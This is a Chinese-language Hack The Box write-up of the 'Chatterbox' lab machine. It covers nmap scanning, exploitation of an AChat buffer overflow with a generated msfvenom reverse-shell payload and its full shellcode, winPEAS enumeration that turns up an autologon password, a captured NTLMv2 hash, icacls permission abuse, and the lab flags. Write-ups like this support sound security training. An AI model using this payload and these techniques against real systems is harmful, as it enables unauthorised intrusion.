Chatterbox-htb-writeup

0x00 靶场技能介绍

章节技能：9255,9256端口服务版本探测、AChat服务远程命令执行、SMB服务文件传输、icacls和cacls命令的文件权限修改、目录权限枚举

参考链接：https://www.jgeek.cn/article/111.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.74

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.74 -oG allports 
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 16:44 CST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.74
Host is up (0.33s latency).
Not shown: 65042 closed tcp ports (reset), 482 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
9255/tcp  open  mon
9256/tcp  open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
135,139,445,9255,9256,49152,49153,49154,49155,49156,49157,                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p135,139,445,9255,9256,49152,49153,49154,49155,49156,49157 --min-rate=10000 -sC -sV 10.10.10.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 16:46 CST
Nmap scan report for 10.10.10.74
Host is up (0.48s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  tcpwrapped
9256/tcp  open  tcpwrapped
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  unknown
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-03-28T13:47:39
|_  start_date: 2024-03-28T13:41:33
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-28T09:47:41-04:00
|_clock-skew: mean: 6h20m01s, deviation: 2h18m38s, median: 4h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.25 seconds

3、其实到这里，我的枚举就出现一些问题了，比如上面新增的9255和9256端口，都是相较于以往没有出现过的，且在1万端口以内，故下面继续对这两个端口进行服务版本探测

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p9255,9256 -sV 10.10.10.74                      
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 17:19 CST
Nmap scan report for 10.10.10.74
Host is up (0.49s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

4、发现了具体服务的内容，尝试搜索该软件服务的漏洞

Achat 易受基于 SEH 的堆栈缓冲区溢出的影响 - https://www.speedguide.net/port.php?port=9256

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit AChat            
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                           | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)              | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                   | php/webapps/24647.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

5、尝试下载并研究如何利用

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 36025          
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
    Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /home/kali/Desktop/36025.py

6、经过查看poc源码，知道只需要生成一个反弹shell的shellcode和设置接收反弹shell的监听地址即可。

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x79\x6c\x58\x68\x52\x62\x79\x70"
buf += b"\x79\x70\x4d\x30\x31\x50\x52\x69\x6b\x35\x4d\x61"
buf += b"\x59\x30\x51\x54\x62\x6b\x70\x50\x30\x30\x64\x4b"
buf += b"\x31\x42\x5a\x6c\x54\x4b\x70\x52\x7a\x74\x44\x4b"
buf += b"\x31\x62\x6e\x48\x6c\x4f\x48\x37\x6d\x7a\x6f\x36"
buf += b"\x50\x31\x4b\x4f\x56\x4c\x6f\x4c\x33\x31\x53\x4c"
buf += b"\x7a\x62\x6e\x4c\x6b\x70\x56\x61\x68\x4f\x6c\x4d"
buf += b"\x4a\x61\x49\x37\x48\x62\x6c\x32\x6f\x62\x6e\x77"
buf += b"\x54\x4b\x6e\x72\x6e\x30\x52\x6b\x6f\x5a\x4f\x4c"
buf += b"\x54\x4b\x6e\x6c\x4c\x51\x74\x38\x4b\x33\x31\x38"
buf += b"\x79\x71\x56\x71\x72\x31\x44\x4b\x51\x49\x6d\x50"
buf += b"\x39\x71\x47\x63\x74\x4b\x6f\x59\x4c\x58\x37\x73"
buf += b"\x6e\x5a\x70\x49\x62\x6b\x6f\x44\x54\x4b\x6b\x51"
buf += b"\x77\x66\x4e\x51\x59\x6f\x76\x4c\x77\x51\x66\x6f"
buf += b"\x4a\x6d\x6b\x51\x75\x77\x6d\x68\x59\x50\x31\x65"
buf += b"\x68\x76\x59\x73\x51\x6d\x39\x68\x4f\x4b\x43\x4d"
buf += b"\x4c\x64\x50\x75\x47\x74\x42\x38\x64\x4b\x62\x38"
buf += b"\x6c\x64\x4a\x61\x76\x73\x70\x66\x72\x6b\x6c\x4c"
buf += b"\x50\x4b\x74\x4b\x71\x48\x6b\x6c\x6d\x31\x68\x53"
buf += b"\x42\x6b\x59\x74\x42\x6b\x6b\x51\x36\x70\x54\x49"
buf += b"\x31\x34\x6e\x44\x6b\x74\x4f\x6b\x31\x4b\x50\x61"
buf += b"\x4e\x79\x51\x4a\x50\x51\x69\x6f\x37\x70\x51\x4f"
buf += b"\x51\x4f\x51\x4a\x74\x4b\x6d\x42\x5a\x4b\x44\x4d"
buf += b"\x4f\x6d\x51\x58\x4c\x73\x30\x32\x6b\x50\x79\x70"
buf += b"\x63\x38\x32\x57\x31\x63\x4d\x62\x4f\x6f\x32\x34"
buf += b"\x4f\x78\x50\x4c\x31\x67\x4e\x46\x39\x77\x4b\x4f"
buf += b"\x39\x45\x75\x68\x42\x70\x4d\x31\x59\x70\x4b\x50"
buf += b"\x6e\x49\x77\x54\x4e\x74\x52\x30\x31\x58\x4b\x79"
buf += b"\x71\x70\x32\x4b\x4d\x30\x79\x6f\x47\x65\x70\x50"
buf += b"\x70\x50\x52\x30\x42\x30\x4f\x50\x52\x30\x6d\x70"
buf += b"\x4e\x70\x6f\x78\x79\x5a\x4a\x6f\x69\x4f\x77\x70"
buf += b"\x69\x6f\x68\x55\x52\x77\x42\x4a\x49\x75\x53\x38"
buf += b"\x4a\x6a\x6b\x5a\x4a\x6e\x4a\x6b\x32\x48\x4d\x32"
buf += b"\x39\x70\x4b\x51\x57\x4b\x55\x39\x4a\x46\x30\x6a"
buf += b"\x4e\x30\x50\x56\x6f\x67\x63\x38\x63\x69\x35\x55"
buf += b"\x70\x74\x73\x31\x4b\x4f\x77\x65\x32\x65\x55\x70"
buf += b"\x30\x74\x6c\x4c\x6b\x4f\x6e\x6e\x4c\x48\x42\x55"
buf += b"\x68\x6c\x6f\x78\x68\x70\x76\x55\x46\x42\x51\x46"
buf += b"\x4b\x4f\x77\x65\x73\x38\x72\x43\x32\x4d\x43\x34"
buf += b"\x6b\x50\x33\x59\x57\x73\x70\x57\x61\x47\x72\x37"
buf += b"\x70\x31\x6b\x46\x51\x5a\x4c\x52\x50\x59\x70\x56"
buf += b"\x79\x52\x79\x6d\x43\x36\x65\x77\x4e\x64\x6d\x54"
buf += b"\x6d\x6c\x79\x71\x79\x71\x32\x6d\x61\x34\x4f\x34"
buf += b"\x5a\x70\x69\x36\x4b\x50\x31\x34\x6e\x74\x50\x50"
buf += b"\x6f\x66\x50\x56\x51\x46\x4f\x56\x42\x36\x70\x4e"
buf += b"\x4e\x76\x62\x36\x52\x33\x30\x56\x6f\x78\x74\x39"
buf += b"\x76\x6c\x6d\x6f\x43\x56\x59\x6f\x69\x45\x52\x69"
buf += b"\x59\x50\x4e\x6e\x70\x56\x4f\x56\x79\x6f\x4e\x50"
buf += b"\x43\x38\x79\x78\x45\x37\x4b\x6d\x63\x30\x4b\x4f"
buf += b"\x46\x75\x77\x4b\x38\x70\x38\x35\x37\x32\x62\x36"
buf += b"\x51\x58\x55\x56\x45\x45\x57\x4d\x55\x4d\x49\x6f"
buf += b"\x4a\x35\x6d\x6c\x6c\x46\x33\x4c\x4a\x6a\x43\x50"
buf += b"\x4b\x4b\x4b\x30\x33\x45\x6c\x45\x55\x6b\x31\x37"
buf += b"\x4b\x63\x34\x32\x42\x4f\x61\x5a\x79\x70\x52\x33"
buf += b"\x49\x6f\x46\x75\x41\x41"

7、替换poc中的shellcode 同时设置目标地址，开始尝试利用，这里其实尝试了很多次才利用成功

┌──(kali㉿offsec)-[~/Desktop]
└─$ python2 36025.py
---->{P00F}!

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443                                     
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Windows\system32>

8、接下来读取第一个flag信息

C:\Windows\system32>net time /domain
net time /domain
Could not find the domain controller for domain WORKGROUP.

More help is available by typing NET HELPMSG 3913.


C:\Windows\system32>cd C:/Users/alfred/Desktop
cd C:/Users/alfred/Desktop

C:\Users\Alfred\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of C:\Users\Alfred\Desktop

12/10/2017  07:50 PM    <DIR>          .
12/10/2017  07:50 PM    <DIR>          ..
03/28/2024  09:42 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,346,927,616 bytes free

C:\Users\Alfred\Desktop>type user.txt
type user.txt
c6901715ed8c01797bfa79a3be759668

C:\Users\Alfred\Desktop>

0x02 系统权限获取

9、在上面初步尝试了下，发现了并没有域环境，故继续开始进行信息收集

C:\Users\Alfred\Desktop>systeminfo
systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          3/28/2024, 9:41:25 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,560 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,634 MB
Virtual Memory: In Use:    461 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Hotfix(s):                 183 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           [03]: KB2841134
                           [04]: KB2670838
                           [05]: KB2830477
                           [06]: KB2592687
                           [07]: KB2479943
                           [08]: KB2491683
                           [09]: KB2506212
                           [10]: KB2506928
                           [11]: KB2509553
                           [12]: KB2533552
                           [13]: KB2534111
                           [14]: KB2545698
                           [15]: KB2547666
                           [16]: KB2552343
                           [17]: KB2560656
                           [18]: KB2563227
                           [19]: KB2564958
                           [20]: KB2574819
                           [21]: KB2579686
                           [22]: KB2604115
                           [23]: KB2620704
                           [24]: KB2621440
                           [25]: KB2631813
                           [26]: KB2639308
                           [27]: KB2640148
                           [28]: KB2647753
                           [29]: KB2654428
                           [30]: KB2660075
                           [31]: KB2667402
                           [32]: KB2676562
                           [33]: KB2685811
                           [34]: KB2685813
                           [35]: KB2690533
                           [36]: KB2698365
                           [37]: KB2705219
                           [38]: KB2719857
                           [39]: KB2726535
                           [40]: KB2727528
                           [41]: KB2729094
                           [42]: KB2732059
                           [43]: KB2732487
                           [44]: KB2736422
                           [45]: KB2742599
                           [46]: KB2750841
                           [47]: KB2761217
                           [48]: KB2763523
                           [49]: KB2770660
                           [50]: KB2773072
                           [51]: KB2786081
                           [52]: KB2799926
                           [53]: KB2800095
                           [54]: KB2807986
                           [55]: KB2808679
                           [56]: KB2813430
                           [57]: KB2820331
                           [58]: KB2834140
                           [59]: KB2840631
                           [60]: KB2843630
                           [61]: KB2847927
                           [62]: KB2852386
                           [63]: KB2853952
                           [64]: KB2857650
                           [65]: KB2861698
                           [66]: KB2862152
                           [67]: KB2862330
                           [68]: KB2862335
                           [69]: KB2864202
                           [70]: KB2868038
                           [71]: KB2871997
                           [72]: KB2884256
                           [73]: KB2891804
                           [74]: KB2892074
                           [75]: KB2893294
                           [76]: KB2893519
                           [77]: KB2894844
                           [78]: KB2900986
                           [79]: KB2908783
                           [80]: KB2911501
                           [81]: KB2912390
                           [82]: KB2918077
                           [83]: KB2919469
                           [84]: KB2923545
                           [85]: KB2931356
                           [86]: KB2937610
                           [87]: KB2943357
                           [88]: KB2952664
                           [89]: KB2966583
                           [90]: KB2968294
                           [91]: KB2970228
                           [92]: KB2972100
                           [93]: KB2973112
                           [94]: KB2973201
                           [95]: KB2973351
                           [96]: KB2977292
                           [97]: KB2978742
                           [98]: KB2984972
                           [99]: KB2985461
                           [100]: KB2991963
                           [101]: KB2992611
                           [102]: KB3003743
                           [103]: KB3004361
                           [104]: KB3004375
                           [105]: KB3006121
                           [106]: KB3006137
                           [107]: KB3010788
                           [108]: KB3011780
                           [109]: KB3013531
                           [110]: KB3020370
                           [111]: KB3020388
                           [112]: KB3021674
                           [113]: KB3021917
                           [114]: KB3022777
                           [115]: KB3023215
                           [116]: KB3030377
                           [117]: KB3035126
                           [118]: KB3037574
                           [119]: KB3042058
                           [120]: KB3045685
                           [121]: KB3046017
                           [122]: KB3046269
                           [123]: KB3054476
                           [124]: KB3055642
                           [125]: KB3059317
                           [126]: KB3060716
                           [127]: KB3061518
                           [128]: KB3067903
                           [129]: KB3068708
                           [130]: KB3071756
                           [131]: KB3072305
                           [132]: KB3074543
                           [133]: KB3075226
                           [134]: KB3078601
                           [135]: KB3078667
                           [136]: KB3080149
                           [137]: KB3084135
                           [138]: KB3086255
                           [139]: KB3092627
                           [140]: KB3093513
                           [141]: KB3097989
                           [142]: KB3101722
                           [143]: KB3102429
                           [144]: KB3107998
                           [145]: KB3108371
                           [146]: KB3108381
                           [147]: KB3108664
                           [148]: KB3109103
                           [149]: KB3109560
                           [150]: KB3110329
                           [151]: KB3118401
                           [152]: KB3122648
                           [153]: KB3123479
                           [154]: KB3126587
                           [155]: KB3127220
                           [156]: KB3133977
                           [157]: KB3137061
                           [158]: KB3138378
                           [159]: KB3138612
                           [160]: KB3138910
                           [161]: KB3139398
                           [162]: KB3139914
                           [163]: KB3140245
                           [164]: KB3147071
                           [165]: KB3150220
                           [166]: KB3150513
                           [167]: KB3156016
                           [168]: KB3156019
                           [169]: KB3159398
                           [170]: KB3161102
                           [171]: KB3161949
                           [172]: KB3161958
                           [173]: KB3172605
                           [174]: KB3177467
                           [175]: KB3179573
                           [176]: KB3184143
                           [177]: KB3185319
                           [178]: KB4014596
                           [179]: KB4019990
                           [180]: KB4040980
                           [181]: KB976902
                           [182]: KB982018
                           [183]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.74

C:\Users\Alfred\Desktop>

10、可以发现安装的补丁还是非常多的，这里想直接使用一些二进制的漏洞，估计GG吧，接下来使用impacket搭建一个SMB服务，把我们的winpeas.exe枚举工具给放上去

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ impacket-smbserver share . -smb2support                              
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.74,49159)
[*] AUTHENTICATE_MESSAGE (CHATTERBOX\Alfred,CHATTERBOX)
[*] User CHATTERBOX\Alfred authenticated successfully
[*] Alfred::CHATTERBOX:aaaaaaaaaaaaaaaa:2aad644ab41de7d9109df296923b7bde:0101000000000000804d87e1f380da010d7b9e7d8295d61f00000000010010006a0047007a0058005100790059007800030010006a0047007a00580051007900590078000200100076004500730073006300510041006300040010007600450073007300630051004100630007000800804d87e1f380da01060004000200000008003000300000000000000000000000002000008af90681e870d358ce4dc5c0e7563e131c4a218f0517f193a4a9512bfa9f8fb30a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found winPEASx64.exe
[-] SMB2_TREE_CONNECT not found winPEASx64.exe
[*] Connecting Share(2:share)


C:\Users\Alfred\Desktop>copy \\10.10.14.11\share\winPEASx86.exe .
copy \\10.10.14.11\share\winPEASx86.exe .
        1 file(s) copied.

C:\Users\Alfred\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of C:\Users\Alfred\Desktop

03/28/2024  10:45 AM    <DIR>          .
03/28/2024  10:45 AM    <DIR>          ..
03/28/2024  09:42 AM                34 user.txt
12/19/2023  10:16 AM         2,387,456 winPEASx64.exe
01/20/2024  02:10 AM         2,388,480 winPEASx86.exe
               3 File(s)      4,775,970 bytes
               2 Dir(s)   3,338,907,648 bytes free

C:\Users\Alfred\Desktop>

11、接下来开始枚举可以利用的信息

C:\Users\Alfred\Desktop>winPEASx86.exe
winPEASx86.exe
......
Home folders found
    C:\Users\Administrator : Alfred [AllAccess]
    C:\Users\Alfred : Alfred [AllAccess]
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Public : Interactive [WriteData/CreateFiles]
......
    Some AutoLogon credentials were found
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!
......

12、其实这一块的信息枚举，我第一次是没注意到这个点的，后来翻看writeup才知道这个，我们对管理员的用户目录有访问权限的。

13、由于我们对该目录有一定的权限，故这里就涉及到一个技巧性的技术。

icacls "C:/Users/Administrator/Desktop/root.txt" /grant Alfred:F

可以看到，对文件、文件夹的 ACL 控制策略 Alfred 用户具备完全访问权限（F），那么可以通过/grant参数获取指定的用户访问权限。通过 cacls 进行查看，当前只有管理员用户。

14、下面通过演示文件访问权限与增加文件访问的权限的设置

C:\Users\Alfred\Desktop>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Users\Alfred\Desktop>icacls "C:/Users/Administrator/Desktop/root.txt"
icacls "C:/Users/Administrator/Desktop/root.txt"
C:/Users/Administrator/Desktop/root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Alfred\Desktop>icacls "C:/Users/Administrator/Desktop/root.txt" /grant Alfred:F
icacls "C:/Users/Administrator/Desktop/root.txt" /grant Alfred:F
processed file: C:/Users/Administrator/Desktop/root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Alfred\Desktop>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Users\Alfred\Desktop>icacls "C:/Users/Administrator/Desktop/root.txt"
icacls "C:/Users/Administrator/Desktop/root.txt"
C:/Users/Administrator/Desktop/root.txt CHATTERBOX\Alfred:(F)
                                        CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Alfred\Desktop>

15、可以看到，我们已经有了对目标文件的所有权限，下面通过cacls命令进行可读赋权

引读链接：https://blog.csdn.net/MagicalProgrammer/article/details/115716711

C:\Users\Alfred\Desktop>cacls C:/Users/Administrator/Desktop/root.txt
cacls C:/Users/Administrator/Desktop/root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:F 
                                        CHATTERBOX\Administrator:F 


C:\Users\Alfred\Desktop>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>type root.txt
type root.txt
285086080585f43b6d7a060251f955b9

C:\Users\Administrator\Desktop>

16、这个靶场试了很多方法，以为可以拿到管理员的反弹shell的，结果发现不行，后来看了其他的writeup发现都是不行的。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/123